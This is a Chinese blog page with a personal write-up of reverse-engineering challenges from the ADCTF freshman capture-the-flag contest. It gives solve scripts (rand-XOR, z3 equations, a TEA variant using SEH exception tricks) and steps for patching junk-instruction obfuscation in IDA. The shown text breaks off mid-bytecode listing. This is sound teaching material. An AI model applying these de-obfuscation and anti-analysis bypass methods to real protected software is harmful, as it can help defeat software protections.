<!DOCTYPE html>
<html>
	<head>
		
<title>ADCTF-</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" type="image/x-icon" href="/image/Jeremiah.ico">

<link rel="stylesheet" href="/css/index.css">



<meta name="keywords" content="CTF,">
<meta name="description" content="">


<script src="/js/jquery.min.js"></script>


<script src="/js/index.js"></script>


<script src="/js/fancybox.umd.js"></script>


<script src="/js/fancybox-images.js"></script>


<script src="/js/gitalk.min.js"></script>


<script src="/js/hljs.min.js"></script>
 
<script>hljs.highlightAll();</script>

	<meta name="generator" content="Hexo 7.3.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
</head>

	<body>
		
	<div class="header">
		<div class="header-top" id="header-top">
			<div class="h-left">
				<a href="/">
					<img src="/image/logo.png" alt="Quiet">
				</a>
			</div>
			<div class="h-right">
				<ul>
					
						
								<li>
									<a href="/">
										HOME
									</a>
									<span class="dot"></span>
								</li>
								
									
						
								<li>
									<a href="/archives">
										ARCHIVE
									</a>
									<span class="dot"></span>
								</li>
								
									
						
								<li>
									<a href="/categories">
										CATEGORIES
									</a>
									<span class="dot"></span>
								</li>
								
									
						
								<li>
									<a href="/tags">
										TAGS
									</a>
									<span class="dot"></span>
								</li>
								
									
						
								<li>
									<a href="/links">
										LINKS
									</a>
									<span class="dot"></span>
								</li>
								
									
						
								<li>
									<a href="/about">
										ABOUT
									</a>
									<span class="dot"></span>
								</li>
								
									
				</ul>
			</div>
			<div class="h-right-close">
				<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="24" height="24">
					<path fill="none" d="M0 0h24v24H0z" />
					<path d="M3 4h18v2H3V4zm0 7h18v2H3v-2zm0 7h18v2H3v-2z" fill="rgba(68,68,68,1)" />
				</svg>
			</div>
		</div>
	</div>
	<div class="sidebar">
    <div class="topo">
        <h2>Jeremiah</h2>
    </div>
    <ul>
        
        <li>
            <a href="/">HOME</a>
        </li>
        
        <li>
            <a href="/archives">ARCHIVE</a>
        </li>
        
        <li>
            <a href="/categories">CATEGORIES</a>
        </li>
        
        <li>
            <a href="/tags">TAGS</a>
        </li>
        
        <li>
            <a href="/links">LINKS</a>
        </li>
        
        <li>
            <a href="/about">ABOUT</a>
        </li>
        
    </ul>
    <div class="my_foot">
        
        <a target="_blank" rel="noopener" href="https://github.com/79E/hexo-theme-quiet">
            <img src="https://cdn.jsdelivr.net/gh/duogongneng/MyBlogImg/imggithub.png" alt="Quiet主题">
        </a>
        
    </div>
</div>
<div class='shelter'>
</div>
<style>
    .shelter{
        background-color: #333;
        opacity:0.5;
        cursor: pointer;
        display: none; 
        position: fixed;
        left: 0;
        top: 0; 
        right: 0;
        bottom: 0;
        z-index: 1998;
    }
    .sidebar {
        width: 66%;
        height: 100%;
        position: fixed;
        top: 0;
        right: -100%;
        bottom: 0;
        background: #fff;
        z-index: 1999;
        text-align: center;
        box-shadow: -6px 0 20px rgba(98, 94, 94, .815);
    }

    .topo {
        width: 100%;
        height: 200px;
        background: url(https://api.ixiaowai.cn/gqapi/gqapi.php) no-repeat;
        background-size: 100% 100%;
        position: relative;
        display: flex;
        align-items: flex-end
    }

    .topo h2 {
        color: #fff;
        z-index: 1;
        position: relative;
        margin: 0 0 10px 10px;
        font-size: 1.2em;
        box-sizing: border-box
    }

    .topo:before {
        content: '';
        background-image: url(/image/pattern.png);
        background-repeat: repeat;
        height: 100%;
        left: 0;
        position: absolute;
        top: 0;
        width: 100%;
        z-index: 1
    }

    .sidebar ul {
        width: 100%;
        margin-top: 50px
    }

    .sidebar ul li {
        height: 50px;
        list-style: none;
        font-size: 1.2em;
        text-align: right;
        margin-right: 10px
    }

    .sidebar ul li a {
        display: grid;
        color: #5d606a;
        text-overflow: ellipsis;
        width: 100%;
        text-decoration: none
    }

    .my_foot {
        width: 100%;
        padding: 10px;
        margin-bottom: 10px;
        position: absolute;
        bottom: 0
    }

    .my_foot a {
        text-decoration: none;
        margin-right: 10px;
        display: inline-block
    }

    .my_foot a img {
        width: 30px;
        height: 30px
    }
</style>

<script>
    $( function () {
	$( '.h-right-close>svg' )
		.click( function () {
			$( '.sidebar' )
				.animate( {
					right: "0"
				}, 500 );
			$( '.shelter' )
				.fadeIn( "slow" )
		} );
	$( '.shelter' )
		.click( function ( e ) {
			$( '.sidebar' )
				.animate( {
					right: "-100%"
				}, 500 );
			$( '.shelter' )
				.fadeOut( "slow" )
		} )
} )

</script>

<div class="post">
    <div class="post-header-background post-header-img"
    style="background: url('https://api.ixiaowai.cn/gqapi/gqapi.php')" 
>
    <div class="post-header-background-content">
        <ul class="post-header-tag">
            
            
            <li><a href="/tags/CTF">CTF</a></li>
            
            
        </ul>
        
        <h1>ADCTF</h1>
        <div class="post-header-info">
            <div class="post-header-info-author">
                
                    <svg t="1604839279282" class="icon" viewBox="0 0 1024 1024" version="1.1"
                        xmlns="http://www.w3.org/2000/svg" p-id="2901" width="20" height="20">
                        <path
                            d="M513 956.3c-247.7 0-448-200.3-448-448S265.3 66.2 513 66.2s448 200.3 448 448-200.3 442.1-448 442.1z m0-830.9c-212.2 0-388.8 170.7-388.8 388.8C124.2 726.3 294.9 903 513 903c212.2 0 388.8-170.7 388.8-388.8S725.2 125.4 513 125.4z m0 430.2c-94.2 0-170.7-76.5-170.7-170.7S418.8 207.8 513 207.8s170.7 76.5 170.7 170.7S607.2 555.6 513 555.6z m0-289.1c-64.6 0-112 52.8-112 112s47.4 117.9 112 117.9 112-52.8 112-112-47.4-117.9-112-117.9z m0 689.8c-135.7 0-259-58.7-341.9-158.9l-11.8-17.8 11.8-17.8c76.5-117.9 206.2-188.5 347.8-188.5 135.7 0 265 64.6 341.9 182.6l11.8 17.8-11.8 17.8C778 897.1 648.7 956.3 513 956.3zM230.3 773.2C300.9 849.7 406.9 897 513 897c112 0 218.1-47.4 288.6-129.8-70.5-88.2-170.7-135.6-282.7-135.6s-218.1 53.3-288.6 141.6z"
                            p-id="2902" fill="#ffffff"></path>
                    </svg>
                    
                <span class="post-header-info-author-text"> <a target="_blank" rel="noopener" href="https://github.com/Jeremiah-gdut">Je2em1ah</a></span>
                <div class="post-header-info-author-categories">
                    
                         <a href="../../categories/CTF/" target="_blank" >CTF</a>
                    
                </div>
                <p>2020-11-04 04:33:36</p>
            </div>
        </div>
    </div>
</div>
    <div class="post-content" id="content">
  
  <div id="article" class="post-content-info">
    
      <div id="post-toc">
        <span class="post-toc-title">文章目录</span>
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-text">ADCTF新生赛个人wp</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Reverse"><span class="toc-text">Reverse</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#checkin"><span class="toc-text">checkin</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ezPy"><span class="toc-text">ezPy</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%96%9D%E7%82%B9%E8%8C%B6%E5%90%A7"><span class="toc-text">喝点茶吧</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Py-revenge"><span class="toc-text">Py_revenge</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#NotOnlyDotNet"><span class="toc-text">NotOnlyDotNet</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#what-why"><span class="toc-text">what!why!!!</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Do-you-like-Kotone"><span class="toc-text">Do you like Kotone?</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Crypto"><span class="toc-text">Crypto</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Too-Close-To-Sqrt"><span class="toc-text">Too_Close_To_Sqrt</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#One-Key-Pad"><span class="toc-text">One_Key_Pad</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Pwn"><span class="toc-text">Pwn</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#ret2text"><span class="toc-text">ret2text</span></a></li></ol></li></ol></li></ol>
      </div>
    

    <h1>ADCTF新生赛个人wp</h1>
<h2 id="Reverse">Reverse</h2>
<h3 id="checkin">checkin</h3>
<p><img src="https://jeremiah.oss-cn-shenzhen.aliyuncs.com/picture/202412032105818.png" alt="image-20241201213852340"></p>
<p>IDA打开可以看到逻辑很简单 直接给出exp</p>
<figure class="highlight c"><table><tbody><tr><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdlib.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;string.h&gt;</span></span><br><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span> {<br>    <span class="hljs-type">char</span> encoded[<span class="hljs-number">30</span>] = { <span class="hljs-number">0x55</span>, <span class="hljs-number">0x17</span>, <span class="hljs-number">0xC9</span>, <span class="hljs-number">0xBB</span>, <span class="hljs-number">0x4A</span>, <span class="hljs-number">0xA5</span>, <span class="hljs-number">0x86</span>, <span class="hljs-number">0xDF</span>, <span class="hljs-number">0x24</span>, <span class="hljs-number">0x0A</span>, <br>  <span class="hljs-number">0x1C</span>, <span class="hljs-number">0xA3</span>, <span class="hljs-number">0x27</span>, <span class="hljs-number">0xA1</span>, <span class="hljs-number">0x57</span>, <span class="hljs-number">0x35</span>, <span class="hljs-number">0xC3</span>, <span class="hljs-number">0xDB</span>, <span class="hljs-number">0x91</span>, <span class="hljs-number">0x88</span>, <br>  <span class="hljs-number">0x6D</span>, <span class="hljs-number">0x91</span>, <span class="hljs-number">0xA0</span>, <span class="hljs-number">0xCC</span>, <span class="hljs-number">0x71</span>, <span class="hljs-number">0x57</span>, <span class="hljs-number">0x71</span>, <span class="hljs-number">0xE4</span>, <span class="hljs-number">0x40</span> };<br>    <span class="hljs-type">char</span> original_input[<span class="hljs-number">30</span>];<br>    <span class="hljs-type">int</span> i;<br><br>    srand(<span class="hljs-number">0x7E8</span>u); <br>    <span class="hljs-keyword">for</span> (i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">29</span>; ++i) {<br>        original_input[i] = encoded[i] ^ rand();<br>    }<br>    original_input[<span class="hljs-number">29</span>] = <span class="hljs-string">'\0'</span>; <br><br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%s\n"</span>,original_input);<br><br>    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br><span class="hljs-comment">//flag{y0u_Know_rAnd0m_4nd_xOr}</span><br></code></pre></td></tr></tbody></table></figure>
<p>注意需要在linux环境下运行(<strong>Windows和Linux下生成的随机数不同，附件为64位elf文件</strong>)</p>
<hr>
<h3 id="ezPy">ezPy</h3>
<p>下载附件后发现是个pyinstaller打包的python文件(可以通过图标辨别)，用pyinstxtractor解包得到main.pyc文件，用在线网站对pyc文件反编译(用本地的pycdc也可以解决)</p>
<p><img src="https://jeremiah.oss-cn-shenzhen.aliyuncs.com/picture/202412032105886.png" alt="image-20241201214834185"></p>
<p>前面还有一段是密文数据，程序的逻辑就是每9个字节通过不同的表达式计算得到encoded数组，逆向思路只需要对这个方程组进行求解即可，采用z3约束求解器进行求解，exp如下</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> z3 <span class="hljs-keyword">import</span> *<br><br><span class="hljs-comment"># Create a list of Z3 integer variables for the flag</span><br>flag = [Int(<span class="hljs-string">f"flag_<span class="hljs-subst">{i}</span>"</span>) <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">36</span>)]<br><br><span class="hljs-comment"># Create a solver</span><br>solver = Solver()<br><br><span class="hljs-comment"># The secret values from the original problem</span><br>secret = [<br>    <span class="hljs-number">631</span>, <span class="hljs-number">1205</span>, -<span class="hljs-number">500</span>, <span class="hljs-number">1021</span>, <span class="hljs-number">1879</span>, <span class="hljs-number">668</span>, -<span class="hljs-number">281</span>, <span class="hljs-number">1651</span>, <span class="hljs-number">1326</span>, <span class="hljs-number">593</span>, <span class="hljs-number">428</span>, -<span class="hljs-number">170</span>, <span class="hljs-number">515</span>,<br>    <span class="hljs-number">1302</span>, <span class="hljs-number">452</span>, <span class="hljs-number">41</span>, <span class="hljs-number">814</span>, <span class="hljs-number">379</span>, <span class="hljs-number">382</span>, <span class="hljs-number">629</span>, <span class="hljs-number">650</span>, <span class="hljs-number">273</span>, <span class="hljs-number">1529</span>, <span class="hljs-number">630</span>, <span class="hljs-number">418</span>, <span class="hljs-number">1207</span>, <span class="hljs-number">1076</span>,<br>    <span class="hljs-number">315</span>, <span class="hljs-number">1118</span>, <span class="hljs-number">469</span>, <span class="hljs-number">398</span>, <span class="hljs-number">1803</span>, <span class="hljs-number">647</span>, <span class="hljs-number">729</span>, <span class="hljs-number">1439</span>, <span class="hljs-number">1104</span><br>]<br><br><span class="hljs-comment"># Add constraints for each encoded value</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>, <span class="hljs-number">36</span>, <span class="hljs-number">9</span>):<br>    solver.add(<span class="hljs-number">3</span> * flag[i] + <span class="hljs-number">7</span> * flag[i + <span class="hljs-number">1</span>] - <span class="hljs-number">2</span> * flag[i + <span class="hljs-number">2</span>] + <span class="hljs-number">5</span> * flag[i + <span class="hljs-number">3</span>] - <span class="hljs-number">6</span> * flag[i + <span class="hljs-number">4</span>] - <span class="hljs-number">14</span> == secret[i])<br>    solver.add(-<span class="hljs-number">5</span> * flag[i + <span class="hljs-number">1</span>] + <span class="hljs-number">9</span> * flag[i + <span class="hljs-number">2</span>] + <span class="hljs-number">4</span> * flag[i + <span class="hljs-number">3</span>] - <span class="hljs-number">3</span> * flag[i + <span class="hljs-number">4</span>] + <span class="hljs-number">7</span> * flag[i + <span class="hljs-number">5</span>] - <span class="hljs-number">18</span> == secret[i + <span class="hljs-number">1</span>])<br>    solver.add(<span class="hljs-number">6</span> * flag[i] - <span class="hljs-number">4</span> * flag[i + <span class="hljs-number">1</span>] + <span class="hljs-number">2</span> * flag[i + <span class="hljs-number">2</span>] - <span class="hljs-number">9</span> * flag[i + <span class="hljs-number">5</span>] + <span class="hljs-number">5</span> * flag[i + <span class="hljs-number">6</span>] - <span class="hljs-number">25</span> == secret[i + <span class="hljs-number">2</span>])<br>    solver.add(<span class="hljs-number">7</span> * flag[i + <span class="hljs-number">1</span>] + <span class="hljs-number">3</span> * flag[i + <span class="hljs-number">3</span>] - <span class="hljs-number">8</span> * flag[i + <span class="hljs-number">4</span>] + <span class="hljs-number">6</span> * flag[i + <span class="hljs-number">5</span>] - <span class="hljs-number">2</span> * flag[i + <span class="hljs-number">6</span>] + <span class="hljs-number">4</span> * flag[i + <span class="hljs-number">7</span>] - <span class="hljs-number">30</span> == secret[i + <span class="hljs-number">3</span>])<br>    solver.add(<span class="hljs-number">2</span> * flag[i] + <span class="hljs-number">5</span> * flag[i + <span class="hljs-number">2</span>] - <span class="hljs-number">4</span> * flag[i + <span class="hljs-number">4</span>] + <span class="hljs-number">7</span> * flag[i + <span class="hljs-number">5</span>] + <span class="hljs-number">9</span> * flag[i + <span class="hljs-number">8</span>] - <span class="hljs-number">20</span> == secret[i + <span class="hljs-number">4</span>])<br>    solver.add(<span class="hljs-number">8</span> * flag[i] - <span class="hljs-number">3</span> * flag[i + <span class="hljs-number">1</span>] + <span class="hljs-number">5</span> * flag[i + <span class="hljs-number">3</span>] - <span class="hljs-number">6</span> * flag[i + <span class="hljs-number">7</span>] + <span class="hljs-number">2</span> * flag[i + <span class="hljs-number">8</span>] - <span class="hljs-number">19</span> == secret[i + <span class="hljs-number">5</span>])<br>    solver.add(-<span class="hljs-number">7</span> * flag[i + <span class="hljs-number">1</span>] + <span class="hljs-number">4</span> * flag[i + <span class="hljs-number">2</span>] - <span class="hljs-number">5</span> * flag[i + <span class="hljs-number">5</span>] + <span class="hljs-number">3</span> * flag[i + <span class="hljs-number">6</span>] + <span class="hljs-number">6</span> * flag[i + <span class="hljs-number">8</span>] - <span class="hljs-number">22</span> == secret[i + <span class="hljs-number">6</span>])<br>    solver.add(<span class="hljs-number">9</span> * flag[i] + <span class="hljs-number">2</span> * flag[i + <span class="hljs-number">2</span>] + <span class="hljs-number">6</span> * flag[i + <span class="hljs-number">3</span>] - <span class="hljs-number">4</span> * flag[i + <span class="hljs-number">6</span>] + <span class="hljs-number">5</span> * flag[i + <span class="hljs-number">7</span>] - <span class="hljs-number">3</span> * flag[i + <span class="hljs-number">8</span>] - <span class="hljs-number">27</span> == secret[i + <span class="hljs-number">7</span>])<br>    solver.add(<span class="hljs-number">4</span> * flag[i] - <span class="hljs-number">5</span> * flag[i + <span class="hljs-number">4</span>] + <span class="hljs-number">7</span> * flag[i + <span class="hljs-number">5</span>] + <span class="hljs-number">3</span> * flag[i + <span class="hljs-number">6</span>] + <span class="hljs-number">9</span> * flag[i + <span class="hljs-number">7</span>] - <span class="hljs-number">2</span> * flag[i + <span class="hljs-number">8</span>] - <span class="hljs-number">33</span> == secret[i + <span class="hljs-number">8</span>])<br><br><span class="hljs-comment"># Add constraints for flag ASCII values (valid ASCII range)</span><br><span class="hljs-keyword">for</span> f <span class="hljs-keyword">in</span> flag:<br>    solver.add(<span class="hljs-number">0</span> &lt;= f, f &lt;= <span class="hljs-number">255</span>)<br><br><span class="hljs-comment"># Check if the solver finds a solution</span><br><span class="hljs-keyword">if</span> solver.check() == sat:<br>    model = solver.model()<br>    result = <span class="hljs-string">''</span>.join(<span class="hljs-built_in">chr</span>(model[flag[i]].as_long()) <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">36</span>))<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">"The flag is:"</span>, result)<br><span class="hljs-keyword">else</span>:<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">"No solution found"</span>)<br><span class="hljs-comment">#flag{y0U_4rE_r3@1ly_g0o0oOd_At_m4Th}</span><br></code></pre></td></tr></tbody></table></figure>
<hr>
<h3 id="喝点茶吧">喝点茶吧</h3>
<p>IDA打开之后，程序是加花过的，下面给出去花过程</p>
<p><img src="https://jeremiah.oss-cn-shenzhen.aliyuncs.com/picture/202412032105863.png" alt="image-20241201215540491"></p>
<p>这段汇编指令ebx先xor了自己，所以ZF标志位一定是0，程序正常的执行流程只会执行jz指令跳转到0x4012FA+1的位置，解决方法patch掉0x4012FA的字节再把剩下的字节转换成code即可(<strong>C</strong>)</p>
<p><img src="https://jeremiah.oss-cn-shenzhen.aliyuncs.com/picture/202412032105109.png" alt="image-20241201215952410"></p>
<p>第二处花指令和第一处类似，patch0x401328处的字节即可，包括loc_401320这一段数据也可以直接nop掉，因为程序只会执行jz这条指令的控制流，中间的都是不会执行的垃圾数据，去除完之后就可以在函数头按P定义这个函数，再F5反编译就可以看到main函数(已经过整理)</p>
<p><img src="https://jeremiah.oss-cn-shenzhen.aliyuncs.com/picture/202412032105852.png" alt="image-20241201220538603"></p>
<p>接着分析encrypt函数</p>
<p><img src="https://jeremiah.oss-cn-shenzhen.aliyuncs.com/picture/202412032105880.png" alt="image-20241201220753115"></p>
<p>发现并没有找到加密过程，查看这个函数的汇编可以发现这个函数也被加入了花指令</p>
<p><img src="https://jeremiah.oss-cn-shenzhen.aliyuncs.com/picture/202412182311310.png" alt="image-20241201221107308"></p>
<p>看到这个位置，先是call了一个附近的位置，然后retn，call指令会把call指令的下一条指令的地址入栈，retn则会把存入栈中的地址弹出到eip中，这一段操作没有改变程序原来的执行流程，但是会导致IDA识别出错导致栈失衡，解决方法就是从call指令到retn的下一个字节全部patch掉(0x401215 - 0x401251)，接着就能看到完整的逻辑了</p>
<p><img src="https://jeremiah.oss-cn-shenzhen.aliyuncs.com/picture/202412182311382.png" alt="image-20241201221650758"></p>
<p>__scrt_common_main_seh()就是具体的加密过程，然而这个函数也有花指令:(</p>
<p><img src="https://jeremiah.oss-cn-shenzhen.aliyuncs.com/picture/202412182311402.png" alt="image-20241201222028668"></p>
<p>这两个位置和前面提到的基本一样，不赘述</p>
<p><img src="https://jeremiah.oss-cn-shenzhen.aliyuncs.com/picture/202412182311409.png" alt="image-20241201222327113"></p>
<p>可以看到tea加密的特征，但是尝试解密得到的结果是错误的，这里有个MEMORY[0] = 0指令，这里要提到Windows系统下的异常处理机制<strong>SEH</strong>，简要来说就是通过某些逻辑错误导致系统发送错误信号，然后由SEH的过滤器来决定要不要接管这个错误，一旦系统开始接管这个错误，就会跳转到相应的处理函数，处理完成之后继续执行程序</p>
<p>更详细的可以看(<a target="_blank" rel="noopener" href="https://bbs.kanxue.com/thread-249592.htm">https://bbs.kanxue.com/thread-249592.htm</a>)</p>
<p>有了前面的知识之后，对程序动调，可以发现当ebp+var_1C地址处的值为0(<strong>sum = 0</strong>)时，程序在这个地方触发了一个异常(<strong>非法访问内存地址</strong>，对应的异常号为0xC0000005),这段指令的意思大概是访问了地址为0x0的内容</p>
<p><img src="https://jeremiah.oss-cn-shenzhen.aliyuncs.com/picture/202412182311336.png" alt="image-20241201223820377"></p>
<p>接着找到异常号对应的处理函数</p>
<p><img src="https://jeremiah.oss-cn-shenzhen.aliyuncs.com/picture/202412182311276.png" alt="image-20241201223637373"></p>
<p>阅读汇编之后其实就是调用了srand函数，seed为0x7E8</p>
<p>当sum！=0的时候，程序继续往下执行会看到这个地方出发了一个除数异常(<strong>SIGILL</strong>，异常号0xC000094)</p>
<p><img src="https://jeremiah.oss-cn-shenzhen.aliyuncs.com/picture/202412182311931.png" alt="image-20241201224107100"></p>
<p>这段汇编的意思就是一个数除以0，触发了这个异常，跳转到异常号对应的处理函数</p>
<p><img src="https://jeremiah.oss-cn-shenzhen.aliyuncs.com/picture/202412182311943.png" alt="image-20241201224311813"></p>
<p>这里就是调用了rand函数，再把sum+=rand()，处理完之后继续执行程序的sum -= delta指令，从这里开始，tea加密的每一轮加密都会调用一次这个rand函数，所以我们需要理一下加密的执行流程：第一轮加密(i=0)正常执行，中间会触发异常调用srand(0x7E8)，后面的31轮加密每次都会执行sum+=rand(),位置在sum-=delta之前，理清执行流程之后就可以写exp了,exp如下(记得在Windows下执行，因为附件是exe文件)</p>
<figure class="highlight c"><table><tbody><tr><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdlib.h&gt;</span></span><br><span class="hljs-type">void</span> <span class="hljs-title function_">tea_decrypt</span><span class="hljs-params">(<span class="hljs-type">unsigned</span> <span class="hljs-type">int</span>* a1, <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span>* a2)</span> {<br>    <span class="hljs-type">int</span> i; <span class="hljs-comment">// [esp+2Ch] [ebp-28h]</span><br>    <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> v3; <span class="hljs-comment">// [esp+30h] [ebp-24h]</span><br>    <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> v4; <span class="hljs-comment">// [esp+34h] [ebp-20h]</span><br>    <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> v5; <span class="hljs-comment">// [esp+38h] [ebp-1Ch]</span><br><br>    v4 = *a1;<br>    v3 = a1[<span class="hljs-number">1</span>];<br>    v5 = <span class="hljs-number">0</span>;<br>    v5 -= <span class="hljs-number">0x61C88647</span>;<br>    <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> seed = <span class="hljs-number">0x7E8</span>;<br>    srand(seed);<br>    <span class="hljs-type">int</span> randoms[<span class="hljs-number">31</span>];<br>    <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">31</span>; i++) {<br>        randoms[i] = rand();  <span class="hljs-comment">// 生成一个随机数</span><br>        v5 += randoms[i];<br>        v5 -= <span class="hljs-number">0x61C88647</span>;<br>    }<br><br>    <span class="hljs-keyword">for</span> (i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">32</span>; ++i)<br>    {<br>        <span class="hljs-comment">//v4 += (a2[v5 &amp; 3] + v5) ^ (v3 + ((v3 &gt;&gt; 5) ^ (16 * v3)));</span><br>        <span class="hljs-comment">//v5 -= 0x61C88647;</span><br>        v3 -= (a2[(v5 &gt;&gt; <span class="hljs-number">11</span>) &amp; <span class="hljs-number">3</span>] + v5) ^ (v4 + ((v4 &gt;&gt; <span class="hljs-number">5</span>) ^ (<span class="hljs-number">16</span> * v4)));<br>        v5 += <span class="hljs-number">0x61C88647</span>;<br>        <span class="hljs-keyword">if</span> (i != <span class="hljs-number">31</span>)<br>            v5 -= randoms[<span class="hljs-number">30</span> - i];<br>        v4 -= (a2[v5 &amp; <span class="hljs-number">3</span>] + v5) ^ (v3 + ((v3 &gt;&gt; <span class="hljs-number">5</span>) ^ (<span class="hljs-number">16</span> * v3)));<br>    }<br>    *a1 = v4;<br>    a1[<span class="hljs-number">1</span>] = v3;<br><br>}<br><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span> {<br>    <span class="hljs-comment">// 加密的数据（假设为两个 32 位整数）</span><br><br>    <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> key[<span class="hljs-number">4</span>] = { <span class="hljs-number">0x114514</span>, <span class="hljs-number">0x1919810</span>, <span class="hljs-number">0x39C5BB</span>, <span class="hljs-number">0xFFE211</span> };  <span class="hljs-comment">// 密钥</span><br>    <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> data[<span class="hljs-number">12</span>] = { <span class="hljs-number">0xC20B1189</span>,<span class="hljs-number">0x275D3ADE</span>, <span class="hljs-number">0xB1ADFCDE</span>, <span class="hljs-number">0x8201166D</span>, <span class="hljs-number">0xCD1E08DC</span>, <span class="hljs-number">0xA0830899</span>, <span class="hljs-number">0xC7C8C706</span>, <span class="hljs-number">0x9FC9A9F5</span>, <span class="hljs-number">0x8250A71D</span>, <span class="hljs-number">0xED329E66</span>, <span class="hljs-number">0xB88D21D7</span>, <span class="hljs-number">0x2EDA3C43</span> };<br>    <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">12</span>; i += <span class="hljs-number">2</span>) {<br>        <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> temp[<span class="hljs-number">2</span>];<br>        temp[<span class="hljs-number">0</span>] = data[i];<br>        temp[<span class="hljs-number">1</span>] = data[i + <span class="hljs-number">1</span>];<br>        tea_decrypt(temp, key);<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%x%x"</span>, temp[<span class="hljs-number">0</span>], temp[<span class="hljs-number">1</span>]);<br>    }<br>    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br><span class="hljs-comment">//flag{Y0u_s0lv3d_thE_Qu3s7I0n_5O_dr1nk_5oMe_t3A}</span><br></code></pre></td></tr></tbody></table></figure>
<hr>
<h3 id="Py-revenge">Py_revenge</h3>
<p>拿到附件之后IDA打开会看到很多的Py字样，再根据题目名字可以猜出是pyinstaller打包的程序，用pyinstxtractor解包得到pyc文件，用pycdc反编译的时候会发现只有部分逻辑</p>
<p><img src="https://jeremiah.oss-cn-shenzhen.aliyuncs.com/picture/202412182311928.png" alt="image-20241202210755221"></p>
<p>这种情况只能用pycdas看字节码</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><code class="hljs bash">[Disassembly]<br>    0       RESUME                          0<br>    2       LOAD_CONST                      0: 0<br>    4       LOAD_CONST                      1: None<br>    6       IMPORT_NAME                     0: <span class="hljs-built_in">base64</span><br>    8       STORE_NAME                      0: <span class="hljs-built_in">base64</span><br>    10      BUILD_LIST                      0<br>    12      LOAD_CONST                      2: (27, 40, 57, 63, 24, 4, 66, 4, 100, 122, 8, 27, 21, 122, 4, 15, 122, 20, 17, 98, 25, 115, 55, 82, 74, 71, 23, 20, 9, 26, 28, 105, 95, 34, 90, 46)<br>    14      LIST_EXTEND                     1<br>    16      STORE_NAME                      1: secret<br>    18      PUSH_NULL                       <br>    20      LOAD_NAME                       2: input<br>    22      LOAD_CONST                      3: <span class="hljs-string">'Please enter the flag:'</span><br>    24      CALL                            1<br>    32      STORE_NAME                      3: flag<br>    34      PUSH_NULL                       <br>    36      LOAD_NAME                       0: <span class="hljs-built_in">base64</span><br>    38      LOAD_ATTR                       8: b64encode<br>    58      LOAD_NAME                       3: flag<br>    60      LOAD_ATTR                       11: encode<br>    80      CALL                            0<br>    88      CALL                            1<br>    96      LOAD_ATTR                       13: decode<br>    116     CALL                            0<br>    124     STORE_NAME                      3: flag<br>    126     LOAD_NAME                       3: 